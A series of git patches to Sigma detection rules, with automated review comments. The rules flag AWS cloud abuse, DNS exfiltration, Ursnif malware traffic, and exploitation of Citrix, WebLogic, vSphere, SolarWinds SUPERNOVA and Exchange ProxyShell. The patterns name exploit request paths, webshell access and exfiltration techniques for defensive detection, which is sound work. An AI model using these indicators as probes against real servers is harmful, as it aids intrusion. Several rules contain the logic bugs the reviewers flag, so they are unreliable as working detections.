@@ -28,4 +28,5 @@ level: medium tags: - attack.impact falsepositives: - - ClusterRoles/Roles being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. ClusterRoles/Roles modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - ClusterRoles/Roles being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - ClusterRoles/Roles modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 30260e8bf7fd9459c308e16a71a3cae647a40b6b Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 9 Aug 2021 10:07:26 +0200 Subject: [PATCH 0263/1367] formatting falsepositives --- rules/cloud/azure_kubernetes_network_policy_change.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/cloud/azure_kubernetes_network_policy_change.yml b/rules/cloud/azure_kubernetes_network_policy_change.yml index 85317337..15163d6e 100644 --- a/rules/cloud/azure_kubernetes_network_policy_change.yml +++ b/rules/cloud/azure_kubernetes_network_policy_change.yml 
@@ -25,4 +25,5 @@ tags: - attack.impact - attack.credential_access falsepositives: - - Network Policy being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Network Policy being modified and deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Network Policy being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Network Policy being modified and deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From ed23f450ea1f273180ed69c9502461ca0b94688e Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 9 Aug 2021 15:41:40 +0200 Subject: [PATCH 0264/1367] split PR 1802 fix rules --- rules/cloud/aws_cloudtrail_disable_logging.yml | 8 ++++---- rules/cloud/aws_config_disable_recording.yml | 8 ++++---- rules/cloud/aws_ec2_disable_encryption.yml | 4 ++-- rules/cloud/aws_ec2_download_userdata.yml | 12 +++++------- rules/cloud/aws_ec2_startup_script_change.yml | 12 +++++------- rules/cloud/aws_enum_listing.yml | 5 +++-- rules/cloud/aws_guardduty_disruption.yml | 8 ++++---- rules/cloud/aws_iam_backdoor_users_keys.yml | 9 ++++----- rules/cloud/aws_rds_change_master_password.yml | 12 +++++------- rules/cloud/aws_rds_public_db_restore.yml | 12 +++++------- rules/cloud/aws_root_account_usage.yml | 6 +++--- rules/cloud/aws_snapshot_backup_exfiltration.yml | 9 ++++----- rules/cloud/aws_update_login_profile.yml | 13 +++++++------ 13 files changed, 55 insertions(+), 63 deletions(-) diff --git a/rules/cloud/aws_cloudtrail_disable_logging.yml b/rules/cloud/aws_cloudtrail_disable_logging.yml index c1634de0..816a25d5 100644 --- a/rules/cloud/aws_cloudtrail_disable_logging.yml 
+++ b/rules/cloud/aws_cloudtrail_disable_logging.yml @@ -4,19 +4,19 @@ status: experimental description: Detects disabling, deleting and updating of a Trail author: vitaliy0x1 date: 2020/01/21 +modified: 2021/08/09 references: - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/best-practices-security.html logsource: service: cloudtrail detection: selection_source: - - eventSource: cloudtrail.amazonaws.com - events: - - eventName: + eventSource: cloudtrail.amazonaws.com + eventName: - StopLogging - UpdateTrail - DeleteTrail - condition: selection_source AND events + condition: selection_source falsepositives: - Valid change in a Trail level: medium diff --git a/rules/cloud/aws_config_disable_recording.yml b/rules/cloud/aws_config_disable_recording.yml index 331701dc..ee3f0ef9 100644 --- a/rules/cloud/aws_config_disable_recording.yml +++ b/rules/cloud/aws_config_disable_recording.yml @@ -4,16 +4,16 @@ status: experimental description: Detects AWS Config Service disabling author: vitaliy0x1 date: 2020/01/21 +modified: 2021/08/09 logsource: service: cloudtrail detection: selection_source: - - eventSource: config.amazonaws.com - events: - - eventName: + eventSource: config.amazonaws.com + eventName: - DeleteDeliveryChannel - StopConfigurationRecorder - condition: selection_source AND events + condition: selection_source falsepositives: - Valid change in AWS Config Service level: high diff --git a/rules/cloud/aws_ec2_disable_encryption.yml b/rules/cloud/aws_ec2_disable_encryption.yml index 6910dbc5..ea7330a3 100644 --- a/rules/cloud/aws_ec2_disable_encryption.yml +++ b/rules/cloud/aws_ec2_disable_encryption.yml 
@@ -4,6 +4,7 @@ status: stable description: Identifies disabling of default Amazon Elastic Block Store (EBS) encryption in the current region. Disabling default encryption does not change the encryption status of your existing volumes. author: Sittikorn S date: 2021/06/29 +modified: 2021/08/09 references: - https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DisableEbsEncryptionByDefault.html tags: @@ -15,8 +16,7 @@ logsource: detection: selection: eventSource: ec2.amazonaws.com - eventName: - - DisableEbsEncryptionByDefault + eventName: DisableEbsEncryptionByDefault status: success condition: selection falsepositives: diff --git a/rules/cloud/aws_ec2_download_userdata.yml b/rules/cloud/aws_ec2_download_userdata.yml index 11daeccb..073bdf6b 100644 --- a/rules/cloud/aws_ec2_download_userdata.yml +++ b/rules/cloud/aws_ec2_download_userdata.yml @@ -4,20 +4,18 @@ status: experimental description: Detects bulk downloading of User Data associated with AWS EC2 instances. Instance User Data may include installation scripts and hard-coded secrets for deployment. author: faloker date: 2020/02/11 -modified: 2020/09/01 +modified: 2021/08/09 references: - https://github.com/RhinoSecurityLabs/pacu/blob/master/modules/ec2__download_userdata/main.py#L24 logsource: service: cloudtrail detection: selection_source: - - eventSource: ec2.amazonaws.com - selection_requesttype: - - requestParameters.attribute: userData - selection_eventname: - - eventName: DescribeInstanceAttribute + eventSource: ec2.amazonaws.com + requestParameters.attribute: userData + eventName: DescribeInstanceAttribute timeframe: 30m - condition: all of them | count() > 10 + condition: selection_source | count() > 10 falsepositives: - Assets management software like device42 level: medium diff --git a/rules/cloud/aws_ec2_startup_script_change.yml b/rules/cloud/aws_ec2_startup_script_change.yml index 75e3eb5a..ac971252 100644 --- a/rules/cloud/aws_ec2_startup_script_change.yml 
+++ b/rules/cloud/aws_ec2_startup_script_change.yml @@ -4,19 +4,17 @@ status: experimental description: Detects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up. author: faloker date: 2020/02/12 -modified: 2020/09/01 +modified: 2021/08/09 references: - https://github.com/RhinoSecurityLabs/pacu/blob/master/modules/ec2__startup_shell_script/main.py#L9 logsource: service: cloudtrail detection: selection_source: - - eventSource: ec2.amazonaws.com - selection_userdata: - - requestParameters.userData: "*" - selection_eventname: - - eventName: ModifyInstanceAttribute - condition: all of them + eventSource: ec2.amazonaws.com + requestParameters.userData: "*" + eventName: ModifyInstanceAttribute + condition: selection_source falsepositives: - Valid changes to the startup script level: high diff --git a/rules/cloud/aws_enum_listing.yml b/rules/cloud/aws_enum_listing.yml index a768e709..fe8f1ca0 100644 --- a/rules/cloud/aws_enum_listing.yml +++ b/rules/cloud/aws_enum_listing.yml @@ -4,13 +4,14 @@ status: experimental description: Detects enumeration of accounts configuration via api call to list different instances and services within a short period of time. author: toffeebr33k date: 2020/11/21 +modified: 2021/08/09 logsource: service: cloudtrail detection: selection_eventname: - - eventName: list* + eventName: list* timeframe: 10m - condition: all of them | count() > 50 + condition: selection_eventname | count() > 50 fields: - userIdentity.arn falsepositives: diff --git a/rules/cloud/aws_guardduty_disruption.yml b/rules/cloud/aws_guardduty_disruption.yml index 6d8d2890..2181fce5 100644 --- a/rules/cloud/aws_guardduty_disruption.yml +++ b/rules/cloud/aws_guardduty_disruption.yml 
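Review bot: `condition: selection_eventname | count() > 50` aggregates every `list*` call in the 10 minute window across all principals, so a busy account trips the rule on routine traffic while a single enumerating identity is not isolated; `fields: - userIdentity.arn` shows the intended pivot, so the condition should be `condition: selection_eventname | count() by userIdentity.arn > 50`. Note also that `list*` relies on Sigma's case-insensitive string matching to hit CloudTrail names such as `ListBuckets`; a backend that emits case-sensitive queries will need the `List*` form, which is worth a comment on that line.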
@@ -4,16 +4,16 @@ status: experimental description: Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs. author: faloker date: 2020/02/11 +modified: 2021/08/09 references: - https://github.com/RhinoSecurityLabs/pacu/blob/master/modules/guardduty__whitelist_ip/main.py#L9 logsource: service: cloudtrail detection: selection_source: - - eventSource: guardduty.amazonaws.com - selection_eventName: - - eventName: CreateIPSet - condition: all of them + eventSource: guardduty.amazonaws.com + eventName: CreateIPSet + condition: selection_source falsepositives: - Valid change in the GuardDuty (e.g. to ignore internal scanners) level: high diff --git a/rules/cloud/aws_iam_backdoor_users_keys.yml b/rules/cloud/aws_iam_backdoor_users_keys.yml index af87cad9..2af725c8 100644 --- a/rules/cloud/aws_iam_backdoor_users_keys.yml +++ b/rules/cloud/aws_iam_backdoor_users_keys.yml @@ -4,19 +4,18 @@ status: experimental description: Detects AWS API key creation for a user by another user. Backdoored users can be used to obtain persistence in the AWS environment. Also with this alert, you can detect a flow of AWS keys in your org. author: faloker date: 2020/02/12 -modified: 2020/09/01 +modified: 2021/08/09 references: - https://github.com/RhinoSecurityLabs/pacu/blob/master/modules/iam__backdoor_users_keys/main.py#L6 logsource: service: cloudtrail detection: selection_source: - - eventSource: iam.amazonaws.com - selection_eventname: - - eventName: CreateAccessKey + eventSource: iam.amazonaws.com + eventName: CreateAccessKey filter: userIdentity.arn|contains: responseElements.accessKey.userName - condition: all of selection* and not filter + condition: selection_source and not filter fields: - userIdentity.arn - responseElements.accessKey.userName diff --git a/rules/cloud/aws_rds_change_master_password.yml b/rules/cloud/aws_rds_change_master_password.yml index 1c13de05..4204cbaf 100644 
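Review bot: The description says the rule detects *updates* of the GuardDuty trusted IP list, but the selection only matches `eventName: CreateIPSet`, so an attacker who edits an existing trusted IP set via `UpdateIPSet` is not covered; the selection should be `eventName: - CreateIPSet - UpdateIPSet`. The referenced pacu module creates a new set, which explains the original choice, but then the description should be narrowed to match or the update call added.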
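Review bot: The `filter` compares `userIdentity.arn` against the literal string `responseElements.accessKey.userName`, not against the value of that field, since Sigma has no field-to-field comparison; the filter therefore never matches, `not filter` is always true, and every `CreateAccessKey` event (including a user creating their own key) fires as a backdoor. Until field references are supported this limitation needs a comment on the filter, e.g. `# NOTE: Sigma cannot compare two fields; self-service key creation is not excluded here`, and the description should say the alert covers all access key creation so analysts are not misled by the "by another user" wording.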
--- a/rules/cloud/aws_rds_change_master_password.yml +++ b/rules/cloud/aws_rds_change_master_password.yml @@ -4,19 +4,17 @@ status: experimental description: Detects the change of database master password. It may be a part of data exfiltration. author: faloker date: 2020/02/12 -modified: 2020/09/01 +modified: 2021/08/09 references: - https://github.com/RhinoSecurityLabs/pacu/blob/master/modules/rds__explore_snapshots/main.py#L10 logsource: service: cloudtrail detection: selection_source: - - eventSource: rds.amazonaws.com - selection_modified_values: - - responseElements.pendingModifiedValues.masterUserPassword: "*" - selection_eventname: - - eventName: ModifyDBInstance - condition: all of them + eventSource: rds.amazonaws.com + responseElements.pendingModifiedValues.masterUserPassword: "*" + eventName: ModifyDBInstance + condition: selection_source falsepositives: - Benign changes to a db instance level: medium diff --git a/rules/cloud/aws_rds_public_db_restore.yml b/rules/cloud/aws_rds_public_db_restore.yml index d1d81841..41497778 100644 --- a/rules/cloud/aws_rds_public_db_restore.yml +++ b/rules/cloud/aws_rds_public_db_restore.yml @@ -4,19 +4,17 @@ status: experimental description: Detects the recovery of a new public database instance from a snapshot. It may be a part of data exfiltration. author: faloker date: 2020/02/12 -modified: 2020/09/01 +modified: 2021/08/09 references: - https://github.com/RhinoSecurityLabs/pacu/blob/master/modules/rds__explore_snapshots/main.py#L10 logsource: service: cloudtrail detection: selection_source: - - eventSource: rds.amazonaws.com - selection_ispublic: - - responseElements.publiclyAccessible: "true" - selection_eventname: - - eventName: RestoreDBInstanceFromDBSnapshot - condition: all of them + eventSource: rds.amazonaws.com + responseElements.publiclyAccessible: "true" + eventName: RestoreDBInstanceFromDBSnapshot + condition: selection_source falsepositives: - unknown level: high 
diff --git a/rules/cloud/aws_root_account_usage.yml b/rules/cloud/aws_root_account_usage.yml index 8702c3a7..e278996f 100644 --- a/rules/cloud/aws_root_account_usage.yml +++ b/rules/cloud/aws_root_account_usage.yml @@ -4,16 +4,16 @@ status: experimental description: Detects AWS root account usage author: vitaliy0x1 date: 2020/01/21 -modified: 2020/09/01 +modified: 2021/08/09 references: - https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html logsource: service: cloudtrail detection: selection_usertype: - - userIdentity.type: Root + userIdentity.type: Root selection_eventtype: - - eventType: AwsServiceEvent + eventType: AwsServiceEvent condition: selection_usertype AND NOT selection_eventtype falsepositives: - AWS Tasks That Require AWS Account Root User Credentials https://docs.aws.amazon.com/general/latest/gr/aws_tasks-that-require-root.html diff --git a/rules/cloud/aws_snapshot_backup_exfiltration.yml b/rules/cloud/aws_snapshot_backup_exfiltration.yml index e2f5b9e8..37814a8f 100644 --- a/rules/cloud/aws_snapshot_backup_exfiltration.yml +++ b/rules/cloud/aws_snapshot_backup_exfiltration.yml @@ -4,6 +4,7 @@ status: test description: Detects the modification of an EC2 snapshot's permissions to enable access from another account author: Darin Smith date: 2021/05/17 +modified: 2021/08/09 references: - https://www.justice.gov/file/1080281/download - https://attack.mitre.org/techniques/T1537/ @@ -11,11 +12,9 @@ logsource: service: cloudtrail detection: selection_source: - - eventSource: cloudtrail.amazonaws.com - events: - - eventName: - - ModifySnapshotAttribute - condition: selection_source AND events + eventSource: cloudtrail.amazonaws.com + eventName: ModifySnapshotAttribute + condition: selection_source falsepositives: - Valid change to a snapshot's permissions level: medium diff --git a/rules/cloud/aws_update_login_profile.yml b/rules/cloud/aws_update_login_profile.yml index f9654450..8ac3ea17 100644 --- a/rules/cloud/aws_update_login_profile.yml 
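Review bot: `eventSource: cloudtrail.amazonaws.com` is wrong for `ModifySnapshotAttribute`, which is an EC2 API call and is logged with the EC2 event source (compare the `eventSource: ec2.amazonaws.com` lines in the other EC2 rules of this same patch); as written the selection can never match and the rule is silently dead. Change the line to `eventSource: ec2.amazonaws.com`. Since the rule targets snapshots being shared to another account, the selection could additionally require a `createVolumePermission` add entry in `requestParameters` to skip permission removals; verify the exact key against a sample event before adding it.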
+++ b/rules/cloud/aws_update_login_profile.yml @@ -1,21 +1,22 @@ title: AWS User Login Profile Was Modified id: 055fb148-60f8-462d-ad16-26926ce050f1 status: experimental -description: An attacker with the iam:UpdateLoginProfile permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup. With this alert, it is used to detect anyone is changing password on behalf of other users. +description: | + An attacker with the iam:UpdateLoginProfile permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup. + With this alert, it is used to detect anyone is changing password on behalf of other users. author: toffeebr33k -date: 2020/11/21 +date: 2021/08/09 references: - https://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation logsource: service: cloudtrail detection: selection_source: - - eventSource: iam.amazonaws.com - selection_eventname: - - eventName: UpdateLoginProfile + eventSource: iam.amazonaws.com + eventName: UpdateLoginProfile filter: userIdentity.arn|contains: responseElements.accessKey.userName - condition: all of selection* and not filter + condition: selection_source and not filter fields: - userIdentity.arn - responseElements.accessKey.userName From fc64b8b93754f33cc7dd69a60312b12aef03f065 Mon Sep 17 00:00:00 2001 
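Review bot: This hunk replaces `date: 2020/11/21` with `date: 2021/08/09` instead of keeping the creation date and adding `modified: 2021/08/09` as every other file in this commit does; the original `date` should be restored and a `modified` line added. The `filter` also compares `userIdentity.arn` with the literal text `responseElements.accessKey.userName`, a field that belongs to `CreateAccessKey` and is not present in an `UpdateLoginProfile` event (the target user is carried in `requestParameters.userName`), so the filter never matches and the rule fires on users changing their own console password too. Since Sigma cannot compare two fields, document that limitation with a comment on the filter and replace the `responseElements.accessKey.userName` entry in `fields` with `requestParameters.userName`.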
From: frack113 Date: Mon, 9 Aug 2021 17:23:15 +0200 Subject: [PATCH 0265/1367] Split PR 1802 fix net rules --- rules/network/net_susp_dns_b64_queries.yml | 5 ++-- rules/network/net_susp_telegram_api.yml | 5 ++-- rules/proxy/proxy_ua_bitsadmin_susp_tld.yml | 5 ++-- rules/proxy/proxy_ua_suspicious.yml | 5 ++-- ...re.yml => proxy_ursnif_malware_c2_url.yml} | 28 ++----------------- .../proxy_ursnif_malware_download_url.yml | 25 +++++++++++++++++ .../web_citrix_cve_2020_8193_8195_exploit.yml | 4 +-- .../web_cve_2018_2894_weblogic_exploit.yml | 5 ++-- .../web/web_solarwinds_supernova_webshell.yml | 5 ++-- ...here_cve_2021_21972_unauth_rce_exploit.yml | 4 +-- rules/web/win_powershell_snapins_hafnium.yml | 4 +-- 11 files changed, 45 insertions(+), 50 deletions(-) rename rules/proxy/{proxy_ursnif_malware.yml => proxy_ursnif_malware_c2_url.yml} (62%) create mode 100644 rules/proxy/proxy_ursnif_malware_download_url.yml diff --git a/rules/network/net_susp_dns_b64_queries.yml b/rules/network/net_susp_dns_b64_queries.yml index 6031ac58..c235127d 100644 --- a/rules/network/net_susp_dns_b64_queries.yml +++ b/rules/network/net_susp_dns_b64_queries.yml @@ -4,15 +4,14 @@ status: experimental description: Detects suspicious DNS queries using base64 encoding author: Florian Roth date: 2018/05/10 -modified: 2020/08/27 +modified: 2021/08/09 references: - https://github.com/krmaxwell/dns-exfiltration logsource: category: dns detection: selection: - query|contains: - - '==.' + query|contains: '==.' condition: selection falsepositives: - Unknown diff --git a/rules/network/net_susp_telegram_api.yml b/rules/network/net_susp_telegram_api.yml index 438406b5..4e813ed8 100644 --- a/rules/network/net_susp_telegram_api.yml +++ b/rules/network/net_susp_telegram_api.yml 
@@ -4,7 +4,7 @@ status: experimental description: Detects suspicious DNS queries to api.telegram.org used by Telegram Bots of any kind author: Florian Roth date: 2018/06/05 -modified: 2020/08/27 +modified: 2021/08/09 references: - https://core.telegram.org/bots/faq - https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/ @@ -14,8 +14,7 @@ logsource: category: dns detection: selection: - query: - - 'api.telegram.org' # Telegram Bot API Request https://core.telegram.org/bots/faq + query: 'api.telegram.org' # Telegram Bot API Request https://core.telegram.org/bots/faq condition: selection falsepositives: - Legitimate use of Telegram bots in the company diff --git a/rules/proxy/proxy_ua_bitsadmin_susp_tld.yml b/rules/proxy/proxy_ua_bitsadmin_susp_tld.yml index d0c169d4..953c84a7 100644 --- a/rules/proxy/proxy_ua_bitsadmin_susp_tld.yml +++ b/rules/proxy/proxy_ua_bitsadmin_susp_tld.yml @@ -4,13 +4,12 @@ status: experimental description: Detects Bitsadmin connections to domains with uncommon TLDs - https://twitter.com/jhencinski/status/1102695118455349248 - https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/ author: Florian Roth date: 2019/03/07 -modified: 2020/09/03 +modified: 2021/08/09 logsource: category: proxy detection: selection: - c-useragent|startswith: - - 'Microsoft BITS/' + c-useragent|startswith: 'Microsoft BITS/' falsepositives: r-dns|endswith: - '.com' diff --git a/rules/proxy/proxy_ua_suspicious.yml b/rules/proxy/proxy_ua_suspicious.yml index 6f3472f1..7f7f82e7 100644 --- a/rules/proxy/proxy_ua_suspicious.yml +++ b/rules/proxy/proxy_ua_suspicious.yml 
@@ -4,7 +4,7 @@ status: experimental description: Detects suspicious malformed user agent strings in proxy logs author: Florian Roth date: 2017/07/08 -modified: 2020/09/03 +modified: 2021/08/09 references: - https://github.com/fastly/waf_testbed/blob/master/templates/default/scanners-user-agents.data.erb logsource: @@ -32,8 +32,7 @@ detection: - 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0' # used by APT28 malware https://threatvector.cylance.com/en_us/home/inside-the-apt28-dll-backdoor-blitz.html - 'HTTPS' # https://twitter.com/stvemillertime/status/1204437531632250880 falsepositives: - c-useragent: - - 'Mozilla/3.0 * Acrobat *' # Acrobat with linked content + c-useragent: 'Mozilla/3.0 * Acrobat *' # Acrobat with linked content condition: ( selection1 or selection2 or selection3 ) and not falsepositives fields: - ClientIP diff --git a/rules/proxy/proxy_ursnif_malware.yml b/rules/proxy/proxy_ursnif_malware_c2_url.yml similarity index 62% rename from rules/proxy/proxy_ursnif_malware.yml rename to rules/proxy/proxy_ursnif_malware_c2_url.yml index 1445ed4f..c1e0b5ca 100644 --- a/rules/proxy/proxy_ursnif_malware.yml +++ b/rules/proxy/proxy_ursnif_malware_c2_url.yml @@ -1,29 +1,3 @@ -title: Ursnif Malware Download URL Pattern -id: a36ce77e-30db-4ea0-8795-644d7af5dfb4 -status: stable -description: Detects download of Ursnif malware done by dropper documents. -author: Thomas Patzke -date: 2019/12/19 -modified: 2020/11/28 -logsource: - category: proxy -detection: - selection: - c-uri|contains|all: - - '/' - - '.php?l=' - c-uri|endswith: '.cab' - sc-status: 200 - condition: selection -fields: - - c-ip - - c-uri - - sc-bytes - - c-ua -falsepositives: - - Unknown -level: critical ---- title: Ursnif Malware C2 URL Pattern id: 932ac737-33ca-4afd-9869-0d48b391fcc9 status: stable 
@@ -31,6 +5,8 @@ description: Detects Ursnif C2 traffic. references: - https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html author: Thomas Patzke +date: 2019/12/19 +modified: 2021/08/09 logsource: category: proxy detection: diff --git a/rules/proxy/proxy_ursnif_malware_download_url.yml b/rules/proxy/proxy_ursnif_malware_download_url.yml new file mode 100644 index 00000000..764eabfb --- /dev/null +++ b/rules/proxy/proxy_ursnif_malware_download_url.yml @@ -0,0 +1,25 @@ +title: Ursnif Malware Download URL Pattern +id: a36ce77e-30db-4ea0-8795-644d7af5dfb4 +status: stable +description: Detects download of Ursnif malware done by dropper documents. +author: Thomas Patzke +date: 2019/12/19 +modified: 2021/08/09 +logsource: + category: proxy +detection: + selection: + c-uri|contains|all: + - '/' + - '.php?l=' + c-uri|endswith: '.cab' + sc-status: 200 + condition: selection +fields: + - c-ip + - c-uri + - sc-bytes + - c-ua +falsepositives: + - Unknown +level: critical \ No newline at end of file diff --git a/rules/web/web_citrix_cve_2020_8193_8195_exploit.yml b/rules/web/web_citrix_cve_2020_8193_8195_exploit.yml index 7e332931..4d65fbdf 100644 --- a/rules/web/web_citrix_cve_2020_8193_8195_exploit.yml +++ b/rules/web/web_citrix_cve_2020_8193_8195_exploit.yml @@ -4,6 +4,7 @@ id: 0d0d9a8a-a49e-4e27-b061-7ce4b936cfb7 author: Florian Roth status: experimental date: 2020/07/10 +modified: 2021/08/09 references: - https://support.citrix.com/article/CTX276688 - https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/ @@ -12,8 +13,7 @@ logsource: category: webserver detection: selection1: - c-uri|contains: - - '/rapi/filedownload?filter=path:%2F' + c-uri|contains: '/rapi/filedownload?filter=path:%2F' selection2: c-uri|contains|all: - '/pcidss/report' 
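Review bot: In the recreated `proxy_ursnif_malware_download_url.yml`, the `'/'` entry under `c-uri|contains|all` matches every URI and contributes nothing, so the selection is effectively `.php?l=` plus `c-uri|endswith: '.cab'` and `sc-status: 200`; drop it and write `c-uri|contains: '.php?l='` next to the `endswith`, or replace it with a fragment that actually discriminates. With `level: critical` and `falsepositives: - Unknown`, a one-line note on what legitimate `.cab` downloads via a `.php?l=` handler would look like is worth adding. The new file also ends without a trailing newline (`\ No newline at end of file`), unlike the rest of the rules in this series.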
diff --git a/rules/web/web_cve_2018_2894_weblogic_exploit.yml b/rules/web/web_cve_2018_2894_weblogic_exploit.yml index 4836bb20..cb39d1fb 100644 --- a/rules/web/web_cve_2018_2894_weblogic_exploit.yml +++ b/rules/web/web_cve_2018_2894_weblogic_exploit.yml @@ -4,7 +4,7 @@ status: experimental description: Detects access to a webshell dropped into a keystore folder on the WebLogic server author: Florian Roth date: 2018/07/22 -modified: 2020/09/03 +modified: 2021/08/09 references: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2894 - https://twitter.com/pyn3rd/status/1020620932967223296 @@ -13,8 +13,7 @@ logsource: category: webserver detection: selection: - c-uri: - - '*/config/keystore/*.js*' + c-uri: '*/config/keystore/*.js*' condition: selection fields: - c-ip diff --git a/rules/web/web_solarwinds_supernova_webshell.yml b/rules/web/web_solarwinds_supernova_webshell.yml index 895a85fd..ec43bcd2 100644 --- a/rules/web/web_solarwinds_supernova_webshell.yml +++ b/rules/web/web_solarwinds_supernova_webshell.yml @@ -4,7 +4,7 @@ status: experimental description: Detects access to SUPERNOVA webshell as described in Guidepoint report author: Florian Roth date: 2020/12/17 -modified: 2020/12/22 +modified: 2021/08/09 references: - https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/ - https://www.anquanke.com/post/id/226029 @@ -19,8 +19,7 @@ detection: - 'logoimagehandler.ashx' - 'clazz' selection2: - c-uri|contains: - - 'logoimagehandler.ashx' + c-uri|contains: 'logoimagehandler.ashx' sc-status: 500 condition: selection1 or selection2 fields: diff --git a/rules/web/web_vsphere_cve_2021_21972_unauth_rce_exploit.yml b/rules/web/web_vsphere_cve_2021_21972_unauth_rce_exploit.yml index 952a50f5..30d7e237 100644 --- a/rules/web/web_vsphere_cve_2021_21972_unauth_rce_exploit.yml +++ b/rules/web/web_vsphere_cve_2021_21972_unauth_rce_exploit.yml 
@@ -4,6 +4,7 @@ status: experimental description: Detects the exploitation of VSphere Remote Code Execution vulnerability as described in CVE-2021-21972 author: Bhabesh Raj date: 2021/02/24 +modified: 2021/08/09 references: - https://www.vmware.com/security/advisories/VMSA-2021-0002.html - https://f5.pm/go-59627.html @@ -13,8 +14,7 @@ logsource: detection: selection: cs-method: 'POST' - c-uri: - - '/ui/vropspluginui/rest/services/uploadova' + c-uri: '/ui/vropspluginui/rest/services/uploadova' condition: selection fields: - c-ip diff --git a/rules/web/win_powershell_snapins_hafnium.yml b/rules/web/win_powershell_snapins_hafnium.yml index 11ffd789..3c35f816 100644 --- a/rules/web/win_powershell_snapins_hafnium.yml +++ b/rules/web/win_powershell_snapins_hafnium.yml @@ -7,6 +7,7 @@ references: - https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/ - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/ date: 2021/03/03 +modified: 2021/08/09 tags: - attack.execution - attack.t1086 @@ -19,8 +20,7 @@ logsource: detection: selection: Image: '*\powershell.exe' - CommandLine: - - '*add-pssnapin microsoft.exchange.powershell.snapin*' + CommandLine: '*add-pssnapin microsoft.exchange.powershell.snapin*' condition: selection fields: - CommandLine From a9ad4eda4adf114866cddc33433dbfba4f3e87e0 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 9 Aug 2021 17:57:34 +0200 Subject: [PATCH 0266/1367] rules: ProxyShell refactoring and new rule --- rules/web/web_exchange_proxyshell.yml | 8 +++-- .../web_exchange_proxyshell_successful.yml | 31 +++++++++++++++++++ .../win_exchange_proxyshell_mailboxexport.yml | 30 ++++++++++++++++++ 3 files changed, 66 insertions(+), 3 deletions(-) create mode 100644 rules/web/web_exchange_proxyshell_successful.yml create mode 100644 rules/windows/process_creation/win_exchange_proxyshell_mailboxexport.yml 
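Review bot: `win_powershell_snapins_hafnium.yml` matches on `Image: '*\powershell.exe'` and `CommandLine`, i.e. it is a process-creation rule, yet it sits in `rules/web/`; check the `logsource:` block just above the second hunk (outside it) and move the file under `rules/windows/process_creation/` so backend field mappings for `Image`/`CommandLine` apply. The `- attack.t1086` tag shown as context in the first hunk is the retired PowerShell technique ID; presumably `attack.t1059.001` is wanted, as other rules in this repo use — confirm against the current ATT&CK mapping before changing it. The `CommandLine` scalar collapse itself is fine.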
diff --git a/rules/web/web_exchange_proxyshell.yml b/rules/web/web_exchange_proxyshell.yml index abcd6c03..e9017771 100644 --- a/rules/web/web_exchange_proxyshell.yml +++ b/rules/web/web_exchange_proxyshell.yml @@ -1,7 +1,7 @@ title: Exchange ProxyShell Pattern id: 23eee45e-933b-49f9-ae1b-df706d2d52ef status: experimental -description: Detects URP patterns that could be found in ProxyShell exloitation attempts against Exchange servers +description: Detects URP patterns that could be found in ProxyShell exploitation attempts against Exchange servers (failed and successful) references: - https://youtu.be/5mqid-7zp8k?t=2231 - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html @@ -22,6 +22,8 @@ detection: - '/mapi/nspi' - '/EWS' - 'X-Rps-CAT' + selection: + sc-status: 401 selection_poc: c-uri|contains: # since we don't know how it will appear in the log files, we'll just use all versions @@ -32,5 +34,5 @@ detection: - 'json?@foo.com' condition: selection_auto and selection_uri or selection_poc falsepositives: - - Could only be an attempt and not a successful attack -level: high \ No newline at end of file + - Unknown +level: medium \ No newline at end of file diff --git a/rules/web/web_exchange_proxyshell_successful.yml b/rules/web/web_exchange_proxyshell_successful.yml new file mode 100644 index 00000000..a4dd76a0 --- /dev/null +++ b/rules/web/web_exchange_proxyshell_successful.yml 
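Review bot: The newly added `selection:` with `sc-status: 401` is never referenced: the condition is still `selection_auto and selection_uri or selection_poc`, so the status check is dead and the rule matches exactly what it did before the commit. If the intent is to make this the attempt-only counterpart of the new "successful" rule, wire it in as `condition: (selection_auto and selection_uri and selection) or selection_poc` (the parentheses also make the `and`-before-`or` precedence explicit), otherwise remove the block. The description still says `URP patterns`, presumably `URI patterns`.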
